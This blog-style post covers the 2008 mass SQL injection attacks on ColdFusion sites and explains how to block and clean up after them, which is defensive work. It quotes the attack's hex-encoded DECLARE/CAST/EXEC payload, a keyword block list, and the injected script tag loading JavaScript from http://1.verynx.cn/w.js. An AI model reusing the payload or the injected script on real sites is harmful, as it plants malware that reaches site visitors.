SQL Injection Attack

ATTACK ON MANY COLDFUSION SITES
On 21-07-2008, there were large-scale SQL injection attacks on many of the websites running under ColdFusion.
Reference site : http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065

PREVENTING THE ATTACK
First of all I would like to refer you to a web page that shows how you can protect your websites from this kind of attack in future, and how to write your <CFQUERY> tag so that no SQL statements can be injected into the database.
Reference page : http://br.sys-con.com/read/165921.htm
On that page you will also find an explanation of how SQL injection actually works.

The above solution is only for you if you have not yet started a new website and are just about to start one, so that you can write your queries from the outset the way the reference page shows.


PREVENTING THE ATTACK IF YOU ALREADY HAVE A RUNNING WEBSITE

But what if you already have a big website developed and running publicly, and it has not been coded like the one above?
You can still change your QUERIES as above (I recommend this). But if your website gets a large number of visits and you cannot, or do not want to, take your site down for some time to make those changes, you need something that prevents the damage in the meantime, and you will probably not want to rely on the above solution alone.

I would like to provide a quick fix for your website to prevent damage to your site while you make the above changes.
That is, identify the following keywords in the URL and abort execution of the website:
DECLARE
EXEC(
CAST(
You also have to make sure that you have never used these keywords in your website for your own purposes.
One more thing to keep in mind: form values posted by a user with the GET method can also trigger a block in the above validation if the user enters any of the above keywords in the form fields. This will be very rare, because the above keywords are not real words that a user would normally type; only the word DECLARE is likely to cause a block.

The most appropriate location for these validations is your Application.cfm page: you just have to check for the above keywords right at the top of Application.cfm, and if the check returns true, abort the application with the <CFABORT> tag.
You can also save the IP address of the user who is trying to inject SQL through the URL, or take other actions.
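An Application.cfm check along the lines described above, followed by the <cfqueryparam> form of a query that the reference page recommends. This is an added example, not code from the original post; the datasource name myDSN, the users table and the URL.id parameter are assumptions.

```cfml
<!--- Top of Application.cfm: block requests whose query string carries the
      keywords listed above (DECLARE, EXEC(, CAST() and log the client IP.
      Added example, not the original post's code. --->
<cfset blockedKeywords = ["DECLARE", "EXEC(", "CAST("]>

<!--- Decode the query string first so the %20-encoded payload is compared
      in its plain form; FindNoCase makes the match case-insensitive. --->
<cfset decodedQuery = URLDecode(CGI.QUERY_STRING)>
<cfset attackDetected = false>

<cfloop array="#blockedKeywords#" index="keyword">
    <cfif FindNoCase(keyword, decodedQuery)>
        <cfset attackDetected = true>
        <cfbreak>
    </cfif>
</cfloop>

<cfif attackDetected>
    <!--- Record the source address and the offending request, then stop. --->
    <cflog file="sqlinjection" type="warning"
           text="Blocked request from #CGI.REMOTE_ADDR#: #Left(CGI.QUERY_STRING, 500)#">
    <cfabort>
</cfif>

<!--- The permanent fix: bind user input with cfqueryparam instead of
      concatenating it into the SQL. Datasource, table and URL.id are assumed. --->
<cfquery name="getUser" datasource="myDSN">
    SELECT fieldname1
    FROM   users
    WHERE  id = <cfqueryparam value="#URL.id#" cfsqltype="cf_sql_integer">
</cfquery>
```

The keyword check only covers the query string; values sent in a POST body would need the same test on the FORM scope.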

RECOVERING IF THE ATTACK HAS BEEN MADE ON YOUR SITE
And if your website/database has already been infected with the following attack (make sure that the long HEX STRING in the CAST function is exactly as follows):

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
Do not run the above statement.
If you think that your database has been affected with another HEX STRING, then you can try that one by replacing the above string in the CAST function.
Make sure that you do not use EXEC: to check what the above statement actually does, use PRINT instead of EXEC, so that the decoded text is shown without being executed.


And if the attack was made by the above HEX STRING, then all the nvarchar fields in your database will have been replaced as follows:
Before the attack, if the value in the field fieldname1 was yes,
then after the attack the value in fieldname1 will be the old value + "></title><script src="http://1.verynx.cn/w.js"></script><!--
like this: fieldname1 = yes"></title><script src="http://1.verynx.cn/w.js"></script><!--

Then you can run the following query in your SQL Analyser against the affected database.

SELECT 'UPDATE [' + table_name + ']
SET [' + column_name + '] = REPLACE(CAST([' + column_name + '] AS varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''')
WHERE [' + column_name + '] LIKE ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'''
FROM information_schema.columns
WHERE (character_maximum_length IS NOT NULL) AND ([table_name] NOT LIKE 'dt%') AND ([table_name] NOT LIKE 'sys%')

The above query will produce a set of UPDATE statements. Review them and take a backup of the database, then copy those statements and execute them in your SQL Analyser.


I hope this will help someone.

PLEASE COMMENT IF YOU HAVE ANY QUESTIONS OR OTHER SUGGESTIONS.